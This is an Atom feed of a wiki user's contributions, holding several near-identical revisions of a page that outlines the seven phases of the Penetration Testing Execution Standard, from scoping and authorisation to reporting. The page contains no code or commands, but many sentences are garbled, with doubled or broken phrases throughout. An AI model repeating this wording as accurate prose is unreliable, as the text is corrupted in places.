<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://elvis.hcw.ac.at/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=DCiklusic</id>
	<title>Elvis Wiki - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://elvis.hcw.ac.at/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=DCiklusic"/>
	<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php/Special:Contributions/DCiklusic"/>
	<updated>2026-09-10T16:34:29Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.41.5</generator>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Penetration_Testing&amp;diff=11479</id>
		<title>Penetration Testing</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Penetration_Testing&amp;diff=11479"/>
		<updated>2023-02-05T16:50:56Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* References */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
The Penetration Testing Execution Standard (PTES) defines penetration testing in 7 phases. The PTES technical guidelines contain, in particular, practical suggestions for test procedures and recommendations for security tools.&lt;br /&gt;
&lt;br /&gt;
== The seven Phases ==&lt;br /&gt;
&lt;br /&gt;
=== Pre-engagement Interactions ===&lt;br /&gt;
&lt;br /&gt;
Setting the scope is arguably one of the most important components of a penetration test. While many volumes have been written on the various tools and techniques that can be used to gain to gain access to a network, very little has been written about the subject written about the topic that precedes penetration: preparation. Preparation. Neglecting the preparatory activities can leave the penetration tester (or his company) a number of problems, such as a Expansion of the project scope, dissatisfied customers, and even legal problems. The scope of a project defines exactly what should be tested. How each aspects of testing are performed is covered in the Order Rules section. The question to ask as a customer is: Is there sensitive equipment that needs to be handled with need to be careful with when testing? For a local bank, it can be a nuisance if the online banking pages go down for a few hours. When the online banking site of a local bank goes down for a few hours, it might upset a few customers, but would not be nearly as devastating as the compromise of a credit card database.&lt;br /&gt;
&lt;br /&gt;
Scope&lt;br /&gt;
&lt;br /&gt;
- Which IP addresses or hosts are in scope, and which are not?&lt;br /&gt;
&lt;br /&gt;
- Are exploits allowed to be used and likely to crash a service, or should we limit ourselves to just identifying possible vulnerabilities? to be detected?&lt;br /&gt;
&lt;br /&gt;
- Does the customer realize that even a simple port scan can crash a server or router? &lt;br /&gt;
&lt;br /&gt;
- Are social engineering attacks allowed to be carried out?&lt;br /&gt;
&lt;br /&gt;
- Are there specific time windows where the tests should be performed?&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
These are all questions that need to be clarified with the customer in order to avoid misunderstandings. Not to be neglected is to define in writing all the necessary information that is relevant for the penetration test. Each tester must have the authorization to perform a penetration test on the predefined target. If the target does not belong to the company (e.g., the web server is hosted by a third party provider), it is important to ensure that the customer has the formal authorization from the third party to perform the penetration test.&lt;br /&gt;
&lt;br /&gt;
=== Intelligence Gathering ===&lt;br /&gt;
&lt;br /&gt;
Intelligence Gathering is the process of reconnoitering a target to gather as much information as possible that can be used to penetrate the target in the vulnerability assessment and exploitation phase. The more information one can this phase, the more attack vectors one can exploit in the future. Reconnaissance is achieved with the use of tools such as port scanners to gain to get a picture of what systems are on the Internet or internal network and what services are and which services are running there. Open Source Intelligence (OSINT) is a form of information gathering in which information from publicly available sources is searched sources is searched, selected and analyzed to gain actionable insights. gain.&lt;br /&gt;
&lt;br /&gt;
=== Threat Modeling ===&lt;br /&gt;
Threat modeling is about identifying and communicating information about the threats that may can impact a particular system or network. Security threat modeling enables an IT team to understand the nature of the threats and how they may impact the network. In addition, threat modeling can be used to analyze the dangers that threats pose to applications, taking into account their potential vulnerabilities. Based on the data found during information gathering, one develops strategies to penetrate a customer&#039;s systems. For example, if the customer develops proprietary software, an attacker could disrupt the company by gaining access to the internal development systems where source code is developed and tested, and sell the company&#039;s trade secrets to a competitor.&lt;br /&gt;
&lt;br /&gt;
=== Vulnerability Analysis ===&lt;br /&gt;
Vulnerability testing is about discovering vulnerabilities in systems and applications that can be exploited by attackers. These vulnerabilities can range from misconfiguration of hosts and services to insecure application design. . Next, pentesters begin actively discovering vulnerabilities to determine how successful exploit strategies might be. Failed exploits can crash services, trigger intrusion detection alerts, and otherwise ruin the chances of a successful exploit being. At this stage, pentesters often deploy vulnerability scanners that include a Vulnerability database. However, although vulnerability scanners are powerful tools, they cannot completely replace critical thinking, accordingly, results must be reviewed manually.&lt;br /&gt;
&lt;br /&gt;
=== Exploitation ===&lt;br /&gt;
The exploitation phase of a penetration test is exclusively about gaining access to a system or resource bypassing security constraints. If the previous phase, vulnerability assessment, has been properly conducted. This phase should be well planned and a precision strike. The main focus is to determine the main entry point into the organization and identify high-value targets.&lt;br /&gt;
&lt;br /&gt;
=== Post Exploitation ===&lt;br /&gt;
The purpose of the post-exploitation phase is to determine the value of the compromised&lt;br /&gt;
computer and to retain control of the computer for later use. If an unpatched legacy system is penetrated that is not part of a domain or otherwise networked with high-level targets, and that system  is not populated with information of interest to an attacker is filled. The risk of this vulnerability is significantly lower than if access to a domain controller has been proven. The value of the computer is determined by the sensitivity of the data stored on it and the usefulness of the computer for further  compromise of the network. The methods described in this phase  are intended to help the auditor identify and document sensitive data, determine configuration settings, communication channels, and relationships with other network devices that can be used to gain further access to the network,  and to establish one or more methods for subsequent access to the computer. For example, password hashes could be read to see if they can be used to access other systems.&lt;br /&gt;
&lt;br /&gt;
=== Reporting ===&lt;br /&gt;
A pentester must produce a detailed report on the testing process and the vulnerabilities discovered. A penetration test report is the only tangible product of a pentest. The entire purpose of a penetration test is to identify vulnerabilities and security issues that the organization can address - and these are communicated via the report. Therefore, a penetration tester must ensure that they produce the best report possible. A good penetration test report includes a summary of the results and the approach taken, summarizes the vulnerabilities and their impact on the organization, and makes recommendations on how to fix them. &lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* Georgia Weidman. Penetration Testing: A Hands-On Introduction to Hacking. No Starch Press, USA, 1st edition, 2014&lt;br /&gt;
* http://www.pentest-standard.org/index.php/Main_Page&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Penetration_Testing&amp;diff=11478</id>
		<title>Penetration Testing</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Penetration_Testing&amp;diff=11478"/>
		<updated>2023-02-05T16:49:27Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* Pre-engagement Interactions */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
The Penetration Testing Execution Standard (PTES) defines penetration testing in 7 phases. The PTES technical guidelines contain, in particular, practical suggestions for test procedures and recommendations for security tools.&lt;br /&gt;
&lt;br /&gt;
== The seven Phases ==&lt;br /&gt;
&lt;br /&gt;
=== Pre-engagement Interactions ===&lt;br /&gt;
&lt;br /&gt;
Setting the scope is arguably one of the most important components of a penetration test. While many volumes have been written on the various tools and techniques that can be used to gain to gain access to a network, very little has been written about the subject written about the topic that precedes penetration: preparation. Preparation. Neglecting the preparatory activities can leave the penetration tester (or his company) a number of problems, such as a Expansion of the project scope, dissatisfied customers, and even legal problems. The scope of a project defines exactly what should be tested. How each aspects of testing are performed is covered in the Order Rules section. The question to ask as a customer is: Is there sensitive equipment that needs to be handled with need to be careful with when testing? For a local bank, it can be a nuisance if the online banking pages go down for a few hours. When the online banking site of a local bank goes down for a few hours, it might upset a few customers, but would not be nearly as devastating as the compromise of a credit card database.&lt;br /&gt;
&lt;br /&gt;
Scope&lt;br /&gt;
&lt;br /&gt;
- Which IP addresses or hosts are in scope, and which are not?&lt;br /&gt;
&lt;br /&gt;
- Are exploits allowed to be used and likely to crash a service, or should we limit ourselves to just identifying possible vulnerabilities? to be detected?&lt;br /&gt;
&lt;br /&gt;
- Does the customer realize that even a simple port scan can crash a server or router? &lt;br /&gt;
&lt;br /&gt;
- Are social engineering attacks allowed to be carried out?&lt;br /&gt;
&lt;br /&gt;
- Are there specific time windows where the tests should be performed?&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
These are all questions that need to be clarified with the customer in order to avoid misunderstandings. Not to be neglected is to define in writing all the necessary information that is relevant for the penetration test. Each tester must have the authorization to perform a penetration test on the predefined target. If the target does not belong to the company (e.g., the web server is hosted by a third party provider), it is important to ensure that the customer has the formal authorization from the third party to perform the penetration test.&lt;br /&gt;
&lt;br /&gt;
=== Intelligence Gathering ===&lt;br /&gt;
&lt;br /&gt;
Intelligence Gathering is the process of reconnoitering a target to gather as much information as possible that can be used to penetrate the target in the vulnerability assessment and exploitation phase. The more information one can this phase, the more attack vectors one can exploit in the future. Reconnaissance is achieved with the use of tools such as port scanners to gain to get a picture of what systems are on the Internet or internal network and what services are and which services are running there. Open Source Intelligence (OSINT) is a form of information gathering in which information from publicly available sources is searched sources is searched, selected and analyzed to gain actionable insights. gain.&lt;br /&gt;
&lt;br /&gt;
=== Threat Modeling ===&lt;br /&gt;
Threat modeling is about identifying and communicating information about the threats that may can impact a particular system or network. Security threat modeling enables an IT team to understand the nature of the threats and how they may impact the network. In addition, threat modeling can be used to analyze the dangers that threats pose to applications, taking into account their potential vulnerabilities. Based on the data found during information gathering, one develops strategies to penetrate a customer&#039;s systems. For example, if the customer develops proprietary software, an attacker could disrupt the company by gaining access to the internal development systems where source code is developed and tested, and sell the company&#039;s trade secrets to a competitor.&lt;br /&gt;
&lt;br /&gt;
=== Vulnerability Analysis ===&lt;br /&gt;
Vulnerability testing is about discovering vulnerabilities in systems and applications that can be exploited by attackers. These vulnerabilities can range from misconfiguration of hosts and services to insecure application design. . Next, pentesters begin actively discovering vulnerabilities to determine how successful exploit strategies might be. Failed exploits can crash services, trigger intrusion detection alerts, and otherwise ruin the chances of a successful exploit being. At this stage, pentesters often deploy vulnerability scanners that include a Vulnerability database. However, although vulnerability scanners are powerful tools, they cannot completely replace critical thinking, accordingly, results must be reviewed manually.&lt;br /&gt;
&lt;br /&gt;
=== Exploitation ===&lt;br /&gt;
The exploitation phase of a penetration test is exclusively about gaining access to a system or resource bypassing security constraints. If the previous phase, vulnerability assessment, has been properly conducted. This phase should be well planned and a precision strike. The main focus is to determine the main entry point into the organization and identify high-value targets.&lt;br /&gt;
&lt;br /&gt;
=== Post Exploitation ===&lt;br /&gt;
The purpose of the post-exploitation phase is to determine the value of the compromised&lt;br /&gt;
computer and to retain control of the computer for later use. If an unpatched legacy system is penetrated that is not part of a domain or otherwise networked with high-level targets, and that system  is not populated with information of interest to an attacker is filled. The risk of this vulnerability is significantly lower than if access to a domain controller has been proven. The value of the computer is determined by the sensitivity of the data stored on it and the usefulness of the computer for further  compromise of the network. The methods described in this phase  are intended to help the auditor identify and document sensitive data, determine configuration settings, communication channels, and relationships with other network devices that can be used to gain further access to the network,  and to establish one or more methods for subsequent access to the computer. For example, password hashes could be read to see if they can be used to access other systems.&lt;br /&gt;
&lt;br /&gt;
=== Reporting ===&lt;br /&gt;
A pentester must produce a detailed report on the testing process and the vulnerabilities discovered. A penetration test report is the only tangible product of a pentest. The entire purpose of a penetration test is to identify vulnerabilities and security issues that the organization can address - and these are communicated via the report. Therefore, a penetration tester must ensure that they produce the best report possible. A good penetration test report includes a summary of the results and the approach taken, summarizes the vulnerabilities and their impact on the organization, and makes recommendations on how to fix them. &lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Penetration_Testing&amp;diff=11477</id>
		<title>Penetration Testing</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Penetration_Testing&amp;diff=11477"/>
		<updated>2023-02-05T16:49:15Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* Pre-engagement Interactions */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
The Penetration Testing Execution Standard (PTES) defines penetration testing in 7 phases. The PTES technical guidelines contain, in particular, practical suggestions for test procedures and recommendations for security tools.&lt;br /&gt;
&lt;br /&gt;
== The seven Phases ==&lt;br /&gt;
&lt;br /&gt;
=== Pre-engagement Interactions ===&lt;br /&gt;
&lt;br /&gt;
Setting the scope is arguably one of the most important components of a penetration test. While many volumes have been written on the various tools and techniques that can be used to gain to gain access to a network, very little has been written about the subject written about the topic that precedes penetration: preparation. Preparation. Neglecting the preparatory activities can leave the penetration tester (or his company) a number of problems, such as a Expansion of the project scope, dissatisfied customers, and even legal problems. The scope of a project defines exactly what should be tested. How each aspects of testing are performed is covered in the Order Rules section. The question to ask as a customer is: Is there sensitive equipment that needs to be handled with need to be careful with when testing? For a local bank, it can be a nuisance if the online banking pages go down for a few hours. When the online banking site of a local bank goes down for a few hours, it might upset a few customers, but would not be nearly as devastating as the compromise of a credit card database.&lt;br /&gt;
&lt;br /&gt;
Scope&lt;br /&gt;
&lt;br /&gt;
- Which IP addresses or hosts are in scope, and which are not?&lt;br /&gt;
- Are exploits allowed to be used and likely to crash a service, or should we limit ourselves to just identifying possible vulnerabilities? to be detected?&lt;br /&gt;
- Does the customer realize that even a simple port scan can crash a server or router? &lt;br /&gt;
- Are social engineering attacks allowed to be carried out?&lt;br /&gt;
- Are there specific time windows where the tests should be performed?&lt;br /&gt;
&lt;br /&gt;
These are all questions that need to be clarified with the customer in order to avoid misunderstandings. Not to be neglected is to define in writing all the necessary information that is relevant for the penetration test. Each tester must have the authorization to perform a penetration test on the predefined target. If the target does not belong to the company (e.g., the web server is hosted by a third party provider), it is important to ensure that the customer has the formal authorization from the third party to perform the penetration test.&lt;br /&gt;
&lt;br /&gt;
=== Intelligence Gathering ===&lt;br /&gt;
&lt;br /&gt;
Intelligence Gathering is the process of reconnoitering a target to gather as much information as possible that can be used to penetrate the target in the vulnerability assessment and exploitation phase. The more information one can this phase, the more attack vectors one can exploit in the future. Reconnaissance is achieved with the use of tools such as port scanners to gain to get a picture of what systems are on the Internet or internal network and what services are and which services are running there. Open Source Intelligence (OSINT) is a form of information gathering in which information from publicly available sources is searched sources is searched, selected and analyzed to gain actionable insights. gain.&lt;br /&gt;
&lt;br /&gt;
=== Threat Modeling ===&lt;br /&gt;
Threat modeling is about identifying and communicating information about the threats that may can impact a particular system or network. Security threat modeling enables an IT team to understand the nature of the threats and how they may impact the network. In addition, threat modeling can be used to analyze the dangers that threats pose to applications, taking into account their potential vulnerabilities. Based on the data found during information gathering, one develops strategies to penetrate a customer&#039;s systems. For example, if the customer develops proprietary software, an attacker could disrupt the company by gaining access to the internal development systems where source code is developed and tested, and sell the company&#039;s trade secrets to a competitor.&lt;br /&gt;
&lt;br /&gt;
=== Vulnerability Analysis ===&lt;br /&gt;
Vulnerability testing is about discovering vulnerabilities in systems and applications that can be exploited by attackers. These vulnerabilities can range from misconfiguration of hosts and services to insecure application design. . Next, pentesters begin actively discovering vulnerabilities to determine how successful exploit strategies might be. Failed exploits can crash services, trigger intrusion detection alerts, and otherwise ruin the chances of a successful exploit being. At this stage, pentesters often deploy vulnerability scanners that include a Vulnerability database. However, although vulnerability scanners are powerful tools, they cannot completely replace critical thinking, accordingly, results must be reviewed manually.&lt;br /&gt;
&lt;br /&gt;
=== Exploitation ===&lt;br /&gt;
The exploitation phase of a penetration test is exclusively about gaining access to a system or resource bypassing security constraints. If the previous phase, vulnerability assessment, has been properly conducted. This phase should be well planned and a precision strike. The main focus is to determine the main entry point into the organization and identify high-value targets.&lt;br /&gt;
&lt;br /&gt;
=== Post Exploitation ===&lt;br /&gt;
The purpose of the post-exploitation phase is to determine the value of the compromised&lt;br /&gt;
computer and to retain control of the computer for later use. If an unpatched legacy system is penetrated that is not part of a domain or otherwise networked with high-level targets, and that system  is not populated with information of interest to an attacker is filled. The risk of this vulnerability is significantly lower than if access to a domain controller has been proven. The value of the computer is determined by the sensitivity of the data stored on it and the usefulness of the computer for further  compromise of the network. The methods described in this phase  are intended to help the auditor identify and document sensitive data, determine configuration settings, communication channels, and relationships with other network devices that can be used to gain further access to the network,  and to establish one or more methods for subsequent access to the computer. For example, password hashes could be read to see if they can be used to access other systems.&lt;br /&gt;
&lt;br /&gt;
=== Reporting ===&lt;br /&gt;
A pentester must produce a detailed report on the testing process and the vulnerabilities discovered. A penetration test report is the only tangible product of a pentest. The entire purpose of a penetration test is to identify vulnerabilities and security issues that the organization can address - and these are communicated via the report. Therefore, a penetration tester must ensure that they produce the best report possible. A good penetration test report includes a summary of the results and the approach taken, summarizes the vulnerabilities and their impact on the organization, and makes recommendations on how to fix them. &lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Penetration_Testing&amp;diff=11476</id>
		<title>Penetration Testing</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Penetration_Testing&amp;diff=11476"/>
		<updated>2023-02-05T16:49:00Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* Intelligence Gathering */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
The Penetration Testing Execution Standard (PTES) defines penetration testing in 7 phases. The PTES technical guidelines contain, in particular, practical suggestions for test procedures and recommendations for security tools.&lt;br /&gt;
&lt;br /&gt;
== The seven Phases ==&lt;br /&gt;
&lt;br /&gt;
=== Pre-engagement Interactions ===&lt;br /&gt;
&lt;br /&gt;
Setting the scope is arguably one of the most important components of a penetration test. While many volumes have been written on the various tools and techniques that can be used to gain to gain access to a network, very little has been written about the subject written about the topic that precedes penetration: preparation. Preparation. Neglecting the preparatory activities can leave the penetration tester (or his company) a number of problems, such as a Expansion of the project scope, dissatisfied customers, and even legal problems. The scope of a project defines exactly what should be tested. How each aspects of testing are performed is covered in the Order Rules section. The question to ask as a customer is: Is there sensitive equipment that needs to be handled with need to be careful with when testing? For a local bank, it can be a nuisance if the online banking pages go down for a few hours. When the online banking site of a local bank goes down for a few hours, it might upset a few customers, but would not be nearly as devastating as the compromise of a credit card database.&lt;br /&gt;
&lt;br /&gt;
Scope&lt;br /&gt;
- Which IP addresses or hosts are in scope, and which are not?&lt;br /&gt;
- Are exploits allowed to be used and likely to crash a service, or should we limit ourselves to just identifying possible vulnerabilities? to be detected?&lt;br /&gt;
- Does the customer realize that even a simple port scan can crash a server or router? &lt;br /&gt;
- Are social engineering attacks allowed to be carried out?&lt;br /&gt;
- Are there specific time windows where the tests should be performed?&lt;br /&gt;
&lt;br /&gt;
These are all questions that need to be clarified with the customer in order to avoid misunderstandings. Not to be neglected is to define in writing all the necessary information that is relevant for the penetration test. Each tester must have the authorization to perform a penetration test on the predefined target. If the target does not belong to the company (e.g., the web server is hosted by a third party provider), it is important to ensure that the customer has the formal authorization from the third party to perform the penetration test. &lt;br /&gt;
&lt;br /&gt;
=== Intelligence Gathering ===&lt;br /&gt;
&lt;br /&gt;
Intelligence Gathering is the process of reconnoitering a target to gather as much information as possible that can be used to penetrate the target in the vulnerability assessment and exploitation phase. The more information one can this phase, the more attack vectors one can exploit in the future. Reconnaissance is achieved with the use of tools such as port scanners to gain to get a picture of what systems are on the Internet or internal network and what services are and which services are running there. Open Source Intelligence (OSINT) is a form of information gathering in which information from publicly available sources is searched sources is searched, selected and analyzed to gain actionable insights. gain.&lt;br /&gt;
&lt;br /&gt;
=== Threat Modeling ===&lt;br /&gt;
Threat modeling is about identifying and communicating information about the threats that may can impact a particular system or network. Security threat modeling enables an IT team to understand the nature of the threats and how they may impact the network. In addition, threat modeling can be used to analyze the dangers that threats pose to applications, taking into account their potential vulnerabilities. Based on the data found during information gathering, one develops strategies to penetrate a customer&#039;s systems. For example, if the customer develops proprietary software, an attacker could disrupt the company by gaining access to the internal development systems where source code is developed and tested, and sell the company&#039;s trade secrets to a competitor.&lt;br /&gt;
&lt;br /&gt;
=== Vulnerability Analysis ===&lt;br /&gt;
Vulnerability testing is about discovering vulnerabilities in systems and applications that can be exploited by attackers. These vulnerabilities can range from misconfiguration of hosts and services to insecure application design. . Next, pentesters begin actively discovering vulnerabilities to determine how successful exploit strategies might be. Failed exploits can crash services, trigger intrusion detection alerts, and otherwise ruin the chances of a successful exploit being. At this stage, pentesters often deploy vulnerability scanners that include a Vulnerability database. However, although vulnerability scanners are powerful tools, they cannot completely replace critical thinking, accordingly, results must be reviewed manually.&lt;br /&gt;
&lt;br /&gt;
=== Exploitation ===&lt;br /&gt;
The exploitation phase of a penetration test is exclusively about gaining access to a system or resource bypassing security constraints. If the previous phase, vulnerability assessment, has been properly conducted. This phase should be well planned and a precision strike. The main focus is to determine the main entry point into the organization and identify high-value targets.&lt;br /&gt;
&lt;br /&gt;
=== Post Exploitation ===&lt;br /&gt;
The purpose of the post-exploitation phase is to determine the value of the compromised&lt;br /&gt;
computer and to retain control of the computer for later use. If an unpatched legacy system is penetrated that is not part of a domain or otherwise networked with high-level targets, and that system  is not populated with information of interest to an attacker is filled. The risk of this vulnerability is significantly lower than if access to a domain controller has been proven. The value of the computer is determined by the sensitivity of the data stored on it and the usefulness of the computer for further  compromise of the network. The methods described in this phase  are intended to help the auditor identify and document sensitive data, determine configuration settings, communication channels, and relationships with other network devices that can be used to gain further access to the network,  and to establish one or more methods for subsequent access to the computer. For example, password hashes could be read to see if they can be used to access other systems.&lt;br /&gt;
&lt;br /&gt;
=== Reporting ===&lt;br /&gt;
A pentester must produce a detailed report on the testing process and the vulnerabilities discovered. A penetration test report is the only tangible product of a pentest. The entire purpose of a penetration test is to identify vulnerabilities and security issues that the organization can address - and these are communicated via the report. Therefore, a penetration tester must ensure that they produce the best report possible. A good penetration test report includes a summary of the results and the approach taken, summarizes the vulnerabilities and their impact on the organization, and makes recommendations on how to fix them. &lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Penetration_Testing&amp;diff=11475</id>
		<title>Penetration Testing</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Penetration_Testing&amp;diff=11475"/>
		<updated>2023-02-05T16:48:50Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
The Penetration Testing Execution Standard (PTES) defines penetration testing in 7 phases. The PTES technical guidelines contain, in particular, practical suggestions for test procedures and recommendations for security tools.&lt;br /&gt;
&lt;br /&gt;
== The seven Phases ==&lt;br /&gt;
&lt;br /&gt;
=== Pre-engagement Interactions ===&lt;br /&gt;
&lt;br /&gt;
Setting the scope is arguably one of the most important components of a penetration test. While many volumes have been written on the various tools and techniques that can be used to gain to gain access to a network, very little has been written about the subject written about the topic that precedes penetration: preparation. Preparation. Neglecting the preparatory activities can leave the penetration tester (or his company) a number of problems, such as a Expansion of the project scope, dissatisfied customers, and even legal problems. The scope of a project defines exactly what should be tested. How each aspects of testing are performed is covered in the Order Rules section. The question to ask as a customer is: Is there sensitive equipment that needs to be handled with need to be careful with when testing? For a local bank, it can be a nuisance if the online banking pages go down for a few hours. When the online banking site of a local bank goes down for a few hours, it might upset a few customers, but would not be nearly as devastating as the compromise of a credit card database.&lt;br /&gt;
&lt;br /&gt;
Scope&lt;br /&gt;
- Which IP addresses or hosts are in scope, and which are not?&lt;br /&gt;
- Are exploits allowed to be used and likely to crash a service, or should we limit ourselves to just identifying possible vulnerabilities? to be detected?&lt;br /&gt;
- Does the customer realize that even a simple port scan can crash a server or router? &lt;br /&gt;
- Are social engineering attacks allowed to be carried out?&lt;br /&gt;
- Are there specific time windows where the tests should be performed?&lt;br /&gt;
&lt;br /&gt;
These are all questions that need to be clarified with the customer in order to avoid misunderstandings. Not to be neglected is to define in writing all the necessary information that is relevant for the penetration test. Each tester must have the authorization to perform a penetration test on the predefined target. If the target does not belong to the company (e.g., the web server is hosted by a third party provider), it is important to ensure that the customer has the formal authorization from the third party to perform the penetration test. &lt;br /&gt;
&lt;br /&gt;
=== Intelligence Gathering ===&lt;br /&gt;
&lt;br /&gt;
Intelligence Gathering is the process of reconnoitering a target to gather as much information as possible that can be used to penetrate the target in the vulnerability assessment and exploitation phase. The more information one can this phase, the more attack vectors one can exploit in the future. Reconnaissance is achieved with the use of tools such as port scanners to gain to get a picture of what systems are on the Internet or internal network and what services are and which services are running there. Open Source Intelligence (OSINT) is a form of information gathering in which information from publicly available sources is searched sources is searched, selected and analyzed to gain actionable insights. gain.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Threat Modeling ===&lt;br /&gt;
Threat modeling is about identifying and communicating information about the threats that may can impact a particular system or network. Security threat modeling enables an IT team to understand the nature of the threats and how they may impact the network. In addition, threat modeling can be used to analyze the dangers that threats pose to applications, taking into account their potential vulnerabilities. Based on the data found during information gathering, one develops strategies to penetrate a customer&#039;s systems. For example, if the customer develops proprietary software, an attacker could disrupt the company by gaining access to the internal development systems where source code is developed and tested, and sell the company&#039;s trade secrets to a competitor.&lt;br /&gt;
&lt;br /&gt;
=== Vulnerability Analysis ===&lt;br /&gt;
Vulnerability testing is about discovering vulnerabilities in systems and applications that can be exploited by attackers. These vulnerabilities can range from misconfiguration of hosts and services to insecure application design. . Next, pentesters begin actively discovering vulnerabilities to determine how successful exploit strategies might be. Failed exploits can crash services, trigger intrusion detection alerts, and otherwise ruin the chances of a successful exploit being. At this stage, pentesters often deploy vulnerability scanners that include a Vulnerability database. However, although vulnerability scanners are powerful tools, they cannot completely replace critical thinking, accordingly, results must be reviewed manually.&lt;br /&gt;
&lt;br /&gt;
=== Exploitation ===&lt;br /&gt;
The exploitation phase of a penetration test is exclusively about gaining access to a system or resource bypassing security constraints. If the previous phase, vulnerability assessment, has been properly conducted. This phase should be well planned and a precision strike. The main focus is to determine the main entry point into the organization and identify high-value targets.&lt;br /&gt;
&lt;br /&gt;
=== Post Exploitation ===&lt;br /&gt;
The purpose of the post-exploitation phase is to determine the value of the compromised&lt;br /&gt;
computer and to retain control of the computer for later use. If an unpatched legacy system is penetrated that is not part of a domain or otherwise networked with high-level targets, and that system  is not populated with information of interest to an attacker is filled. The risk of this vulnerability is significantly lower than if access to a domain controller has been proven. The value of the computer is determined by the sensitivity of the data stored on it and the usefulness of the computer for further  compromise of the network. The methods described in this phase  are intended to help the auditor identify and document sensitive data, determine configuration settings, communication channels, and relationships with other network devices that can be used to gain further access to the network,  and to establish one or more methods for subsequent access to the computer. For example, password hashes could be read to see if they can be used to access other systems.&lt;br /&gt;
&lt;br /&gt;
=== Reporting ===&lt;br /&gt;
A pentester must produce a detailed report on the testing process and the vulnerabilities discovered. A penetration test report is the only tangible product of a pentest. The entire purpose of a penetration test is to identify vulnerabilities and security issues that the organization can address - and these are communicated via the report. Therefore, a penetration tester must ensure that they produce the best report possible. A good penetration test report includes a summary of the results and the approach taken, summarizes the vulnerabilities and their impact on the organization, and makes recommendations on how to fix them. &lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Penetration_Testing&amp;diff=11474</id>
		<title>Penetration Testing</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Penetration_Testing&amp;diff=11474"/>
		<updated>2023-02-05T16:48:38Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: Created page with &amp;quot;== Summary ==   The Penetration Testing Execution Standard (PTES) defines penetration testing in 7 phases. The PTES technical guidelines contain, in particular, practical suggestions for test procedures and recommendations for security tools.  == Requirements ==  * Operating system: Ubuntu 18.04 bionic amd64 * Packages: git emacs  In order to complete these steps, you must have followed Some Other Documentation before.  == The seven Phases ==  === Pre-engagement Inte...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
The Penetration Testing Execution Standard (PTES) defines penetration testing in 7 phases. The PTES technical guidelines contain, in particular, practical suggestions for test procedures and recommendations for security tools.&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Ubuntu 18.04 bionic amd64&lt;br /&gt;
* Packages: git emacs&lt;br /&gt;
&lt;br /&gt;
In order to complete these steps, you must have followed [[Some Other Documentation]] before.&lt;br /&gt;
&lt;br /&gt;
== The seven Phases ==&lt;br /&gt;
&lt;br /&gt;
=== Pre-engagement Interactions ===&lt;br /&gt;
&lt;br /&gt;
